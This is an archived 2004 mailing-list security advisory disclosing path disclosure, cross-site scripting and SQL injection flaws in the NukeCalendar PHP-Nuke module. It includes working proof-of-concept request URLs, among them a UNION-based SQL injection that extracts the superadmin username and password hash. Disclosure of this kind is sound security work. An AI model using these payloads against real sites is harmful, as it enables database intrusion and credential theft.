lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040408155005.16450.qmail@web21402.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#015 - Multiple vulnerabilities in NukeCalendar v1.1.a]


{================================================================================}
{                              [waraxe-2004-SA#015]   
                          }
{================================================================================}
{                                                     
                          }
{                [ Multiple vulnerabilities in
NukeCalendar v1.1.a ]             }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=15


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NukeCalendar v1.1.a                                
PHP-Nuke Calendar Module for PHP-Nuke
Copyright (c) 2002 by Andi (info@...ba-design.de)
http://www.shiba-design.de
Nuke Calendar is based on EventCalendar 2.0
Copyright (c) 2001 Originally by Rob Sutton     


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure:


Let's try  request like this - 

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar

and we get standard error messages, revealing the full
path to the nuke engine scripting files:

Warning: mysql_fetch_row(): supplied argument is not a
valid MySQL result resource in
D:\apache_wwwroot\nuke71\includes\sql_layer.php on
line 286

Warning: mysql_free_result(): supplied argument is not
a valid MySQL result resource in
D:\apache_wwwroot\nuke71\includes\sql_layer.php on
line 494
 

Another problem are blocks "block-Calendar.php",
"block-Calendar1.php" and "block-Calendar_center.php":


http://localhost/nuke71/blocks/block-Calendar.php
http://localhost/nuke71/blocks/block-Calendar1.php
http://localhost/nuke71/blocks/block-Calendar_center.php

... and we get many error messages. By the way -
blocks in phpnuke contain always protecting
code like this in block-Calendar.php:

if (eregi("block-Calendar2.php",$PHP_SELF)) {
    Header("Location: index.php");

    die();
}

But as we can see, software author renamed the script
without correcting this protecting code. So
we can call this block script directly and it will
lead to massive stream of error messages.



2. Cross-Site Scripting aka XSS:


Example request:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss
code here]

POST request is preffered because of the restrict
filter against GET request in mainfile.php .



3. Sql injection:

This sql injection exploit can pull out from database
any information, for example superadmin's username
and password's md5 hash:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------


__________________________________
Do you Yahoo!?
Yahoo! Small Business $15K Web Design Giveaway 
http://promotions.yahoo.com/design_giveaway/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ